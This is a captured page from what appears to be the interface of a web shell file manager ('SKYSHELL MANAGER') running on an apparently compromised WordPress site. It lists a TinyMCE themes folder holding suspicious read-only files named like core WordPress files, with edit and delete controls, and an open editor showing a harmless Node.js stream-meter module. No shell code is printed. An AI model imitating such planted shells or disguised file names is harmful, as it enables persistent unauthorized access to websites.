📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.js
module.exports = Meter var util = require("util") var Transform = require("stream").Transform if (!Transform) { Transform = require("readable-stream/transform") } function Meter(maxBytes) { if (!(this instanceof Meter)) return new Meter(maxBytes) Transform.call(this) this.bytes = 0 this.maxBytes = maxBytes || Number.MAX_VALUE } util.inherits(Meter, Transform) Meter.prototype._transform = function (chunk, encoding, cb) { this.bytes += chunk.length this.push(chunk) if (this.bytes > this.maxBytes) { return cb(new Error("Stream exceeded specified max of " + this.maxBytes + " bytes.")) } cb() }
Save